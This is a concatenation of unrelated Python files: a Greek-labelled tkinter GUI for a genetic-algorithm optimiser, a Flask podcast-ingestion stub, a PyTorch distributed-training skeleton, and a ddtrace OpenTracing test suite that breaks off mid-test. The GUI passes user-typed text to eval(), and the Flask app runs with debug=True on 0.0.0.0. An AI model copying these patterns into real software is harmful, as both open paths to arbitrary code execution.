self.sync_config_detail['dont_save_file_options'] = dont_save_file_options_var.get()
if dont_save_download_options_var.get() != self.sync_config_detail['dont_save_download_options']:
self.sync_config_detail['dont_save_download_options'] = dont_save_download_options_var.get()
if dont_save_other_options_var.get() != self.sync_config_detail['dont_save_other_options']:
self.sync_config_detail['dont_save_other_options'] = dont_save_other_options_var.get()
|
gui.py
|
import tkinter as tk
from tkinter import END
from tkinter import ttk
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import (
FigureCanvasTkAgg,
)
from gnt import *
from matplotlib.ticker import MaxNLocator
import threading
class MainWindow:
def __init__(self, root, color):
self.color = color
self.root = root
self.root.resizable(0, 0)
self.root.geometry("700x850")
self.root.title("Γενετικοί")
# self.root.columnconfigure(0,weight=1)
# self.root.rowconfigure(8, weight=1)
self.root.configure(bg=self.color)
"""Frames"""
self.top_frame = tk.Frame(
self.root,
width=450,
height=400,
pady=3,
bg=self.color,
relief=tk.RIDGE,
bd=8,
)
        self.bot_frame = tk.Frame(  # graph area and below
self.root, width=450, height=400, pady=3, bg=self.color,
)
        self.inner_frame = tk.Frame(  # below the sliders
self.top_frame,
width=450,
height=200,
pady=3,
relief=tk.RIDGE,
bd=3,
bg=self.color,
)
"""labels"""
# top_frame
        variables_label = tk.Label(  # Domain bounds
self.top_frame,
text=" Πεδία Ορισμού ",
fg="#000000",
font="Courier ",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
        function_label = tk.Label(  # Function
self.top_frame,
text="Συνάρτηση",
fg="#000000",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
population_label = tk.Label(
self.top_frame,
text="Πληθυσμός", # Πληθυσμός
fg="#000000",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
generations_label = tk.Label(
            self.top_frame,  # Generations
text="Γενιές",
fg="black",
font="Courier ",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
        pm_label = tk.Label(  # Mutation probability
self.top_frame,
text="Π. Μετάλλαξης",
fg="black",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
        pc_label = tk.Label(  # Crossover probability
self.top_frame,
text="Π. Διασταύρωσης",
fg="black",
font="Courier ",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
        cp_label = tk.Label(  # Crossover point
self.top_frame,
text="Σημ. Διασταύρωσης",
fg="black",
font="Courier ",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
bits_label = tk.Label( # bits
self.top_frame,
text="Bits",
fg="black",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
        selection_label = tk.Label(  # Selection operator
self.top_frame,
text="Τελεστής Επιλογής",
fg="black",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
        self.bounds_label = tk.Label(  # shows a check mark when the bounds entry is valid, otherwise an X
self.top_frame,
text="",
bg=self.color,
)
# top frame - sliders
        self.pop_slider = tk.Scale(  # population
self.top_frame,
from_=2,
to=500,
resolution=2,
orient="horizontal",
bg=self.color,
)
        self.generation_slider = tk.Scale(  # generations
self.top_frame,
from_=2,
to=1000,
resolution=1,
orient="horizontal",
bg=self.color,
)
        self.pm_slider = tk.Scale(  # mutation probability
self.top_frame,
from_=0,
to=1,
resolution=0.001,
orient="horizontal",
bg=self.color,
)
        self.pc_slider = tk.Scale(  # crossover probability
self.top_frame,
from_=0,
to=1,
resolution=0.01,
orient="horizontal",
bg=self.color,
)
self.bits_slider = tk.Scale( # bits
self.top_frame,
from_=2,
to=40,
resolution=1,
orient="horizontal",
command=self.update_scale,
bg=self.color,
)
        self.cp_slider = tk.Scale(  # crossover point
self.top_frame,
from_=1,
to=self.bits_slider.get(),
resolution=1,
orient="horizontal",
bg=self.color,
)
###################################################################################################################
################################## DROPDOWN ###################################################################
###################################################################################################################
# top frame - dropdowns
        self.bounds_var = tk.StringVar(self.top_frame)  # variable of the second dropdown menu (x, y, z)
        self.bounds_input = tk.StringVar()  # domain bounds entered by the user
        self.var_number = tk.IntVar()  # number of variables - first dropdown menu
        self.function_entry = tk.StringVar()  # function input
        self.radio_var = tk.IntVar()  # selection operator variable
self.choices = {
"x": "0,10",
"y": "0,20",
"z": "0,30"
}
self.option = tk.OptionMenu(self.top_frame, self.bounds_var, *self.choices)
self.option2 = tk.OptionMenu(self.top_frame, self.var_number, *[*range(1,4)],command=self.set_vars )
# function
self.function = ttk.Combobox(self.top_frame, textvariable=self.function_entry,width=35,height=10)
self.func_dict = {
'Beale function':'(1.5-x+x*y)**2+(2.25-x+x*y**2)**2+(2.625-x+x*y**3)**2',
'Booth function':'(x+2*y-7)**2 +(2*x +y -5)**2',
'Matyas function':'0.26*(x**2+y**2)-0.48*x*y',
'Himmelblau\'s function':'(x**2+y-11)**2 + (x+y**2-7)**2',
'Three-hump camel function':'2*x**2-1.05*x**4+x**6/6+x*y+y**2',
'project function':'x**2 + y**3 + z**4 + x*y*z'
}
#adding combobox drop down list
self.function['values']=list(self.func_dict.keys())
self.function.bind("<<ComboboxSelected>>",self.boxcallbackFunc)
# bounds
self.vars_entry = tk.Entry(
self.top_frame, width=10, font="Courier", text=self.bounds_input, justify='center'
)
self.vars_entry.bind("<Return>", self.bind_func)
# radio buttons
self.tourn_button = tk.Radiobutton(
self.top_frame, bg=self.color, text="Tournament", variable=self.radio_var, value=1
)
self.roulette_button = tk.Radiobutton(
self.top_frame,
bg=self.color,
text="Roulette wheel",
variable=self.radio_var,
value=2,
)
###################################################################################################################
# inner frame
        cur_label = tk.Label(  # Current
self.inner_frame,
text="Τρέχων",
fg="white",
font="Courier",
bg="#343434",
relief="raised",
borderwidth=2,
)
bestest_label = tk.Label( # best
self.inner_frame,
text=" Best ",
fg="white",
font="Courier",
bg="#343434",
relief="raised",
borderwidth=2,
)
        gener_label = tk.Label(  # Generation
self.inner_frame,
text=" Γενιά ",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
best_label = tk.Label( # Best fitness
self.inner_frame,
text="Best Fitness",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
average_label = tk.Label( # Average fitness
self.inner_frame,
text="Average Fitness",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
        gener_label2 = tk.Label(  # Generation
self.inner_frame,
text=" Γενιά ",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
x0 = tk.Label( # x
self.inner_frame,
text="x",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
x1 = tk.Label( # y
self.inner_frame,
text="y",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
x2 = tk.Label( # z
self.inner_frame,
text=" z ",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
        cur_label2 = tk.Label(  # Current
self.inner_frame,
text="Τρέχων",
fg="white",
font="Courier",
bg="#343434",
relief="raised",
borderwidth=2,
)
bestest_label2 = tk.Label( # Best
self.inner_frame,
text=" Best ",
fg="white",
font="Courier",
bg="#343434",
relief="raised",
borderwidth=2,
)
        self.gener_output = tk.Label(  # Output: Current - Generation
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
        self.best_output = tk.Label(  # Output: Current - Best Fitness
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
        self.avg_output = tk.Label(  # Output: Current - Average Fitness
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
        self.best_gen_output = tk.Label(  # Output: Best - Generation
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_sol_output = tk.Label( # output Best - Best Fitness
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
        self.gener2_output = tk.Label(  # Output: Current - Generation (second block)
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
        self.x0_output = tk.Label(  # Output: Current - X
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
        self.x1_output = tk.Label(  # Output: Current - Y
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
        self.x2_output = tk.Label(  # Output: Current - Z
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.x_outputs =[self.x0_output, self.x1_output, self.x2_output]
        self.best_gener2_output = tk.Label(  # Output: Best - Generation (bottom block)
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_x0_output = tk.Label( # output Best - x
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_x1_output = tk.Label( # output Best - y
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_x2_output = tk.Label( # output Best - z
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.bestx_output =[self.best_x0_output, self.best_x1_output, self.best_x2_output]
# bottom frame
self.maximize_button = tk.Button( # maximize button
self.bot_frame,
text="maximize",
width=10,
font="Courier 14",
command=lambda: threading.Thread(target=self.maximize).start(),
relief='ridge'
)
self.minimize_button = tk.Button( # minimize button
self.bot_frame,
text="minimize",
width=10,
font="Courier 14",
command=lambda: threading.Thread(target=self.minimize).start(),
relief='ridge'
)
        exit_button = tk.Button(  # exit button
self.bot_frame,
text="exit",
width=10,
font="Courier 14",
command=self.root.destroy,
relief='ridge'
)
# canvas
self.fig = plt.Figure(figsize=(7, 4), dpi=100, facecolor="#efebe9")
self.canvas = FigureCanvasTkAgg( # plot
self.fig,
master=self.bot_frame,
)
self.axes = self.fig.add_subplot(111)
############################################################################################################
###################################### GRIDS ############################################################
############################################################################################################
'''grids'''
# frames
self.inner_frame.grid(row=7, columnspan=5, sticky="nsew")
self.top_frame.grid(row=0)
self.bot_frame.grid(row=1)
self.inner_frame.columnconfigure(2, weight=3)
# top frame
        variables_label.grid(row=0, column=0, sticky="nsew")  # Domain bounds label / variables dropdown
        generations_label.grid(row=4, column=0, sticky="nsew")  # Generations label
        population_label.grid(row=0, column=1, sticky="nsew")  # Population label
        cp_label.grid(row=0, column=2, sticky="nsew")  # Crossover point label
        function_label.grid(row=2, column=0, sticky="nsew")  # Function label
        pc_label.grid(row=2, column=1, sticky="nsew")  # Crossover probability label
        bits_label.grid(row=2, column=2, sticky="nsew")  # Bits label
        pm_label.grid(row=4, column=1, sticky="nsew")  # Mutation probability label
        selection_label.grid(row=4, column=2, sticky="nsew")  # Selection operator label
        self.bounds_label.grid(row=1, column=0, sticky=tk.E)  # check / X label
# inner
        cur_label.grid(row=1, column=0)  # Current label (first block)
        bestest_label.grid(row=2, column=0)  # Best label (first block)
        gener_label.grid(row=0, column=1)  # Generation label (first block)
        best_label.grid(row=0, column=2)  # Best Fitness label
        average_label.grid(row=0, column=3, columnspan=2, sticky="nsew")  # Average Fitness label
        gener_label2.grid(row=3, column=1)  # Generation label (second block)
        x0.grid(row=3, column=2, sticky="nsew")  # x label (second block)
        x1.grid(row=3, column=3, columnspan=2, sticky="nsew")  # y label (second block)
        x2.grid(row=3, column=5, sticky='nsew', columnspan=3)  # z label (second block)
        cur_label2.grid(row=4, column=0)  # Current label (second block)
        bestest_label2.grid(row=5, column=0)  # Best label (second block)
# outputs
        self.gener_output.grid(row=1, column=1)  # Current - Generation output (first block)
        self.best_output.grid(row=1, column=2)  # Current - Best Fitness output (first block)
        self.avg_output.grid(row=1, column=3)  # Current - Average Fitness output (first block)
        self.best_gen_output.grid(row=2, column=1)  # Best - Generation output (first block)
        self.best_sol_output.grid(row=2, column=2)  # Best - Best Fitness output (first block)
        self.gener2_output.grid(row=4, column=1)  # Current - Generation output (second block)
        self.x0_output.grid(row=4, column=2)  # Current - X output (second block)
        self.x1_output.grid(row=4, column=3)  # Current - Y output (second block)
        self.x2_output.grid(row=4, column=5)  # Current - Z output (second block)
        self.best_gener2_output.grid(row=5, column=1)  # Best - Generation output (second block)
        self.best_x0_output.grid(row=5, column=2)  # Best - X output (second block)
        self.best_x1_output.grid(row=5, column=3)  # Best - Y output (second block)
        self.best_x2_output.grid(row=5, column=5)  # Best - Z output (second block)
# sliders
        self.pop_slider.grid(row=1, column=1, sticky='nsew')  # population
        self.generation_slider.grid(row=5, column=0, sticky='nsew')  # generations
        self.pm_slider.grid(row=5, column=1, sticky='nsew')  # mutation probability
        self.pc_slider.grid(row=3, column=1, sticky='nsew')  # crossover probability
        self.bits_slider.grid(row=3, column=2)  # bits
        self.cp_slider.grid(row=1, column=2)  # crossover point
# dropdown bounds
        self.option.grid(row=1, column=0, padx=(0, 50))  # Domain bounds: second dropdown menu (x, y, z)
        self.option2.grid(row=1, column=0, sticky=tk.W)  # Domain bounds: first dropdown menu (1, 2, 3)
# function entry
        self.function.grid(row=3, column=0)  # function entry
#bounds entry
        self.vars_entry.grid(row=1, column=0, padx=(110, 0))  # Domain bounds: bounds input entry
# buttons
self.maximize_button.grid(row=2, column=0, sticky=tk.W) # maximize
self.minimize_button.grid(row=2, column=1) # minimize
exit_button.grid(row=2, column=2, sticky=tk.E) # exit
# radio buttons
self.tourn_button.grid(row=5, column=2) # radio - tournament
self.roulette_button.grid(row=6, column=2) # radio - roulette wheel
# canvas
self.canvas.get_tk_widget().grid(row=0, column=0, columnspan=3) # graph
"""αρχικοποίηση τιμών"""
self.pop_slider.set(100)
self.generation_slider.set(150)
self.pm_slider.set(0.01)
self.pc_slider.set(0.8)
self.bits_slider.set(30)
self.var_number.set(3)
self.bounds_input.set("0,10")
self.radio_var.set(1)
self.bounds_var.set(list(self.choices.keys())[0])
self.function.set("x**2 + y**3 + z**4 + x*y*z")
"""traced var"""
self.bounds_var.trace("w", self.bounds_f)
"""mainloop"""
self.root.mainloop()
#
def set_vars(self,event):
"""
        Sets the number of variables and
        updates the x-y-z variables dropdown menu accordingly.
"""
menu = self.option.children["menu"]
menu.delete(0,"end")
n = self.var_number.get()
t=['x','y','z']
t=[t[i] for i in range(n)]
#initializes bounds
self.choices = dict(zip(t,["-10,10"]*n))
#creates the second drop down menu
for val in self.choices.keys():
menu.add_command(label=val, command=tk._setit(self.bounds_var,val))
self.bounds_var.set(list(self.choices.keys())[0])
def boxcallbackFunc(self,event):
"""
        puts the value from the dictionary of preset functions into the function input
https://www.etutorialspoint.com/index.php/347-python-tkinter-ttk-combobox-event-binding
"""
        selected = event.widget.get()  # keep the Combobox reference in self.function intact
        self.function_entry.set(self.func_dict[selected])
def bind_func(self, event):
"""
        on <Return>, shows whether the entered domain bounds were accepted or not,
        and updates the self.choices dictionary with the accepted bounds
"""
if not self.mk_int(self.vars_entry.get()):
self.bounds_label.config(text="❌", font="Courier", fg="red")
else:
self.bounds_label.config(text="✓", font="Courier", fg="green")
self.choices[self.bounds_var.get()] = self.vars_entry.get()
def bounds_f(self, *args):
"""trace var method"""
var2_ = self.choices[self.bounds_var.get()]
self.bounds_input.set(var2_)
self.bounds_label.config(text="")
def update_scale(self, new_max):
"""configures slider's max val"""
self.cp_slider.configure(to=int(new_max) - 1)
@staticmethod
def mk_int(s):
"""επιστρέφει True αν τα πεδία ορισμού είναι αποδεκτά, διαφορετικά False"""
try:
x, y = s.split(",")
if int(x) >= int(y):
raise ValueError
return True
except ValueError:
return False
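    # Illustrative examples (not in the original source): mk_int("0,10") -> True,
    # mk_int("10,0") -> False (the lower bound must be strictly smaller), and
    # mk_int("abc") -> False.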
    def extract_bounds(self, bounds_dict) -> list:
        """
        Returns the domain bounds as a list of [low, high] integer pairs,
        skipping variables whose bounds are empty.
        """
        return [list(map(int, bounds_dict[val].split(","))) for val in bounds_dict if bounds_dict[val] != ""]
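    # Illustrative example with a hypothetical input (not from the original source):
    # extract_bounds({'x': '0,10', 'y': '-5,5', 'z': ''}) -> [[0, 10], [-5, 5]]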
def graph(self, y1, y2):
"""plots"""
self.fig.clear()
self.axes = self.fig.add_subplot(111)
self.axes.plot(y1, "g", label="average fitness")
self.axes.plot(y2, "r", label="max fitness")
self.axes.set_ylabel("fitness")
self.axes.set_xlabel("generations")
self.axes.yaxis.set_label_position("right")
# legend options
self.axes.legend(
bbox_to_anchor=(0.5, 1.1),
loc="upper center",
ncol=2,
fancybox=True,
shadow=True,
)
# forces integer spacing between generations
self.axes.xaxis.set_major_locator(MaxNLocator(integer=True))
self.canvas.draw()
def minimize(self):
'''minimize button'''
self.objective_function = f"-1*({self.function_entry.get()})"
self.run()
def maximize(self):
'''maximize button'''
self.objective_function = self.function_entry.get()
self.run()
def dreamcatcher(self):
"""tries to catch exceptions a man can only dream of"""
try:
self.bounds = self.extract_bounds(self.choices)
if not any(k in self.objective_function for k in list(self.choices.keys())):
raise Exception("Καμία μεταβλητή")
for key in self.choices.keys():
if self.choices[key] == "" and key in self.objective_function:
raise Exception(
"Ασυμφωνία μεταβλητών συνάρτησης με μεταβλητές Π.Ο."
)
for key in self.choices.keys():
if self.choices[key] != "" and key not in self.objective_function:
raise Exception(
"Ασυμφωνία μεταβλητών συνάρτησης με μεταβλητές Π.Ο."
)
self.generations = self.generation_slider.get()
ga = GeneticAlgorithm(
self.pop_slider.get(),
self.bits_slider.get(),
self.bounds,
self.pm_slider.get(),
self.pc_slider.get(),
self.cp_slider.get(),
eval("lambda x=0,y=0,z=0:" + self.objective_function),
)
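            # The eval above turns the user-supplied expression into a callable,
            # e.g. "x**2 + y" becomes lambda x=0, y=0, z=0: x**2 + y, so any
            # unused variables simply default to 0.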
return ga
except Exception as e:
print(e)
return
def run_helper(self,n,ga,output):
for i in range(n):
output[i].configure(text='{:.2f}'.format(ga.best().real_genes[i]))
def clear_outputs(self):
"""καθαριζει τα πεδια εξοδου"""
self.gener_output.configure(text="")
self.x0_output.configure(text="")
self.x1_output.configure(text="")
self.x2_output.configure(text="")
self.best_x0_output.configure(text="")
self.best_x1_output.configure(text="")
self.best_x2_output.configure(text="")
def run(self):
"""run buttom"""
ga = self.dreamcatcher()
if ga:
self.clear_outputs()
ga.run(self.radio_var.get())
b = [ga.best().fitness]
a = [ga.fitness_average]
self.best = b[0]
self.best_index = 1
for i in range(1, self.generations):
self.run_helper(len(self.bounds),ga,self.x_outputs)
self.gener_output.configure(text=i + 1)
self.gener2_output.configure(text=i + 1)
ga.run(self.radio_var.get())
b.append(ga.best().fitness)
self.best_output.configure(text=float("{:.2f}".format(b[i])))
a.append(ga.fitness_average)
self.avg_output.configure(text=float("{:.2f}".format(a[i])))
if self.best < ga.best().fitness:
self.best = ga.best().fitness
self.best_index = i + 1
self.best_sol_output.configure(text=float("{:.2f}".format(self.best)))
self.best_gen_output.configure(text=self.best_index)
self.best_gener2_output.configure(text=self.best_index)
self.run_helper(len(self.bounds), ga, self.bestx_output)
self.graph(a, b)
self.fig.clear()
def main():
root = tk.Tk()
window = MainWindow(root, "#efebe9")
if __name__ == "__main__":
    main()
|
app.py
|
# OVERALL IMPORTS
from flask import Flask, request
from threading import Thread
import schedule
import time
import os
import pdb
import json
# PODCAST IMPORTS
from podcasts.series_driver import SeriesDriver
from podcasts.episodes_driver import EpisodesDriver
from podcasts.site_crawler import SiteCrawler
from utils.couchbase_storer import CouchbaseStorer
from utils.series_patcher import SeriesPatcher
from utils.constants import *
from utils.thread_pool import *
import utils.log
# Flask App
app = Flask(__name__)
logger = utils.log.logger
patcher = SeriesPatcher("lol")
def digest_podcasts():
"""
Digest most popular podcasts from
iTunes on a daily-basis
"""
# Grab all series first
SeriesDriver(BASE_DIR).get_series_from_urls(SiteCrawler().all_urls())
storer = \
(CouchbaseStorer(PODCASTS_BUCKET_URL)
if PODCASTS_BUCKET_PASSWORD == ''
else CouchbaseStorer(PODCASTS_BUCKET_URL, PODCASTS_BUCKET_PASSWORD))
# Grab all episodes once we have data stored
EpisodesDriver(DIRECTORY, storer).eps_from_series()
def start_rss_polling():
"""
Create a thread pool and a job queue to check the rss feeds of every series
in the podcasts bucket.
"""
logger.info("Starting RSS polling with {} threads and job queue of size {}".format(NUM_RSS_THREADS, JOB_QUEUE_SIZE))
thread_pool = ThreadPool(NUM_RSS_THREADS, JOB_QUEUE_SIZE)
limit = 100
offset = 0
for i in range(NUM_RSS_THREADS):
series_list = patcher.get_series_with_limit(limit, offset)
rss_feed_tups = patcher.create_rss_feed_tups(series_list)
args = (rss_feed_tups, CHECK_TIMESTAMP)
thread_pool.add_task(patcher.patch_multiple, args)
offset += limit
thread_pool.wait_for_all()
def run_schedule():
"""
Check schedule and run pending
"""
    while True:
schedule.run_pending()
time.sleep(1)
@app.route('/refresh/<series_id>')
def refresh(series_id):
"""
Params:
series_id [int] - id for the series as designated by apple
Returns:
JSON object with keys "success" (either 0 or 1) and "episode"
that contains the entire episode object.
Given a series_id, checks to see if we should request apple
to get new episodes. If there are new episodes, returns the new episode object.
"""
episode = {"series_id": series_id, "episode-id": 420, "description":"testing"}
response = {"success": 0, "episode": episode}
return json.dumps(response)
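# Illustrative request/response for the stub above (the series id below is a
# made-up placeholder), assuming the app is running locally on port 5000:
#
#   curl http://localhost:5000/refresh/123456
#   -> {"success": 0, "episode": {"series_id": "123456", "episode-id": 420, "description": "testing"}}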
if __name__ == '__main__':
# schedule.every(ONE_DAY).seconds.do(digest_podcasts)
# schedule.every(15*MINUTES).seconds.do(start_rss_polling)
# t = Thread(target=run_schedule)
# t.start()
# start_rss_polling()
app.run(debug=True, host='0.0.0.0', port=5000, use_reloader=False)
|
mnist1n2g.py
|
import os
import torch
import torch.distributed as dist
from torch.multiprocessing import Process
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torch.utils.data
import torch.utils.data.distributed
import torch.optim as optim
from torchvision import datasets, transforms
from torch.autograd import Variable
def run(rank, size):
""" Distributed function to be implemented later. """
pass
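# A minimal sketch (not part of the original skeleton) of what `run` could do:
# every rank contributes a tensor and the group all-reduces it. The name
# `run_allreduce_example` is a hypothetical illustration.
def run_allreduce_example(rank, size):
    """Sum a one-element tensor across all ranks and print the result."""
    tensor = torch.ones(1)
    dist.all_reduce(tensor, op=dist.ReduceOp.SUM)
    print('Rank {} has result {}'.format(rank, tensor[0].item()))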
# Note: the legacy 'tcp' backend has been removed from PyTorch; use 'gloo' for
# CPU tensors or 'nccl' for GPU tensors.
def init_processes(rank, size, fn, backend='gloo'):
""" Initialize the distributed environment. """
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = '29500'
dist.init_process_group(backend, rank=rank, world_size=size)
fn(rank, size)
if __name__ == "__main__":
size = 2
processes = []
for rank in range(size):
p = Process(target=init_processes, args=(rank, size, run))
p.start()
processes.append(p)
for p in processes:
p.join()
|
test_tracer.py
|
import time
import mock
import opentracing
from opentracing import Format
from opentracing import InvalidCarrierException
from opentracing import SpanContextCorruptedException
from opentracing import UnsupportedFormatException
from opentracing import child_of
import pytest
import ddtrace
from ddtrace.ext.priority import AUTO_KEEP
from ddtrace.opentracer import Tracer
from ddtrace.opentracer import set_global_tracer
from ddtrace.opentracer.span_context import SpanContext
from ddtrace.propagation.http import HTTP_HEADER_TRACE_ID
from ddtrace.settings import ConfigException
class TestTracerConfig(object):
def test_config(self):
"""Test the configuration of the tracer"""
config = {"enabled": True}
tracer = Tracer(service_name="myservice", config=config)
assert tracer._service_name == "myservice"
assert tracer._enabled is True
def test_no_service_name(self):
"""A service_name should be generated if one is not provided."""
tracer = Tracer()
assert tracer._service_name == "pytest"
def test_multiple_tracer_configs(self):
"""Ensure that a tracer config is a copy of the passed config."""
config = {"enabled": True}
tracer1 = Tracer(service_name="serv1", config=config)
assert tracer1._service_name == "serv1"
config["enabled"] = False
tracer2 = Tracer(service_name="serv2", config=config)
# Ensure tracer1's config was not mutated
assert tracer1._service_name == "serv1"
assert tracer1._enabled is True
assert tracer2._service_name == "serv2"
assert tracer2._enabled is False
def test_invalid_config_key(self):
"""A config with an invalid key should raise a ConfigException."""
config = {"enabeld": False}
# No debug flag should not raise an error
tracer = Tracer(service_name="mysvc", config=config)
# With debug flag should raise an error
config["debug"] = True
with pytest.raises(ConfigException) as ce_info:
tracer = Tracer(config=config)
assert "enabeld" in str(ce_info)
assert tracer is not None
# Test with multiple incorrect keys
config["setttings"] = {}
with pytest.raises(ConfigException) as ce_info:
tracer = Tracer(service_name="mysvc", config=config)
assert ["enabeld", "setttings"] in str(ce_info)
assert tracer is not None
def test_global_tags(self):
"""Global tags should be passed from the opentracer to the tracer."""
config = {
"global_tags": {
"tag1": "value1",
"tag2": 2,
},
}
tracer = Tracer(service_name="mysvc", config=config)
with tracer.start_span("myop") as span:
# global tags should be attached to generated all datadog spans
assert span._dd_span.get_tag("tag1") == "value1"
assert span._dd_span.get_metric("tag2") == 2
with tracer.start_span("myop2") as span2:
assert span2._dd_span.get_tag("tag1") == "value1"
assert span2._dd_span.get_metric("tag2") == 2
class TestTracer(object):
def test_start_span(self, ot_tracer, test_spans):
"""Start and finish a span."""
with ot_tracer.start_span("myop") as span:
pass
# span should be finished when the context manager exits
assert span.finished
spans = test_spans.get_spans()
assert len(spans) == 1
def test_start_span_references(self, ot_tracer, test_spans):
"""Start a span using references."""
with ot_tracer.start_span("one", references=[child_of()]):
pass
spans = test_spans.pop()
assert spans[0].parent_id is None
root = ot_tracer.start_active_span("root")
# create a child using a parent reference that is not the context parent
with ot_tracer.start_active_span("one"):
with ot_tracer.start_active_span("two", references=[child_of(root.span)]):
pass
root.close()
spans = test_spans.pop()
assert spans[1].parent_id == spans[0].span_id
assert spans[2].parent_id == spans[0].span_id
def test_start_span_custom_start_time(self, ot_tracer):
"""Start a span with a custom start time."""
t = 100
with mock.patch("ddtrace.span.time_ns") as time:
time.return_value = 102 * 1e9
with ot_tracer.start_span("myop", start_time=t) as span:
pass
assert span._dd_span.start == t
assert span._dd_span.duration == 2
def test_start_span_with_spancontext(self, ot_tracer, test_spans):
"""Start and finish a span using a span context as the child_of
reference.
"""
with ot_tracer.start_span("myop") as span:
with ot_tracer.start_span("myop", child_of=span.context) as span2:
pass
# span should be finished when the context manager exits
assert span.finished
assert span2.finished
spans = test_spans.pop()
assert len(spans) == 2
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
def test_start_span_with_tags(self, ot_tracer):
"""Create a span with initial tags."""
tags = {"key": "value", "key2": "value2"}
with ot_tracer.start_span("myop", tags=tags) as span:
pass
assert span._dd_span.get_tag("key") == "value"
assert span._dd_span.get_tag("key2") == "value2"
def test_start_span_with_resource_name_tag(self, ot_tracer):
"""Create a span with the tag to set the resource name"""
tags = {"resource.name": "value", "key2": "value2"}
with ot_tracer.start_span("myop", tags=tags) as span:
pass
# Span resource name should be set to tag value, and should not get set as
# a tag on the underlying span.
assert span._dd_span.resource == "value"
assert span._dd_span.get_tag("resource.name") is None
# Other tags are set as normal
assert span._dd_span.get_tag("key2") == "value2"
def test_start_active_span_multi_child(self, ot_tracer, test_spans):
"""Start and finish multiple child spans.
This should ensure that child spans can be created 2 levels deep.
"""
with ot_tracer.start_active_span("myfirstop") as scope1:
time.sleep(0.009)
with ot_tracer.start_active_span("mysecondop") as scope2:
time.sleep(0.007)
with ot_tracer.start_active_span("mythirdop") as scope3:
time.sleep(0.005)
# spans should be finished when the context manager exits
assert scope1.span.finished
assert scope2.span.finished
assert scope3.span.finished
spans = test_spans.pop()
# check spans are captured in the trace
assert scope1.span._dd_span is spans[0]
assert scope2.span._dd_span is spans[1]
assert scope3.span._dd_span is spans[2]
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[1].span_id
# sanity check a lower bound on the durations
assert spans[0].duration >= 0.009 + 0.007 + 0.005
assert spans[1].duration >= 0.007 + 0.005
assert spans[2].duration >= 0.005
def test_start_active_span_multi_child_siblings(self, ot_tracer, test_spans):
"""Start and finish multiple span at the same level.
This should test to ensure a parent can have multiple child spans at the
same level.
"""
with ot_tracer.start_active_span("myfirstop") as scope1:
time.sleep(0.009)
with ot_tracer.start_active_span("mysecondop") as scope2:
time.sleep(0.007)
with ot_tracer.start_active_span("mythirdop") as scope3:
time.sleep(0.005)
# spans should be finished when the context manager exits
assert scope1.span.finished
assert scope2.span.finished
assert scope3.span.finished
spans = test_spans.pop()
# check spans are captured in the trace
assert scope1.span._dd_span is spans[0]
assert scope2.span._dd_span is spans[1]
assert scope3.span._dd_span is spans[2]
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[0].span_id
# sanity check a lower bound on the durations
assert spans[0].duration >= 0.009 + 0.007 + 0.005
assert spans[1].duration >= 0.007
assert spans[2].duration >= 0.005
def test_start_span_manual_child_of(self, ot_tracer, test_spans):
"""Start spans without using a scope manager.
Spans should be created without parents since there will be no call
for the active span.
"""
root = ot_tracer.start_span("zero")
with ot_tracer.start_span("one", child_of=root):
with ot_tracer.start_span("two", child_of=root):
with ot_tracer.start_span("three", child_of=root):
pass
root.finish()
spans = test_spans.pop()
assert spans[0].parent_id is None
# ensure each child span is a child of root
assert spans[1].parent_id is root._dd_span.span_id
assert spans[2].parent_id is root._dd_span.span_id
assert spans[3].parent_id is root._dd_span.span_id
assert spans[0].trace_id == spans[1].trace_id and spans[1].trace_id == spans[2].trace_id
def test_start_span_no_active_span(self, ot_tracer, test_spans):
"""Start spans without using a scope manager.
Spans should be created without parents since there will be no call
for the active span.
"""
with ot_tracer.start_span("one", ignore_active_span=True):
with ot_tracer.start_span("two", ignore_active_span=True):
pass
with ot_tracer.start_span("three", ignore_active_span=True):
pass
spans = test_spans.pop()
# ensure each span does not have a parent
assert spans[0].parent_id is None
assert spans[1].parent_id is None
assert spans[2].parent_id is None
# and that each span is a new trace
assert (
spans[0].trace_id != spans[1].trace_id
and spans[1].trace_id != spans[2].trace_id
and spans[0].trace_id != spans[2].trace_id
)
def test_start_active_span_child_finish_after_parent(self, ot_tracer, test_spans):
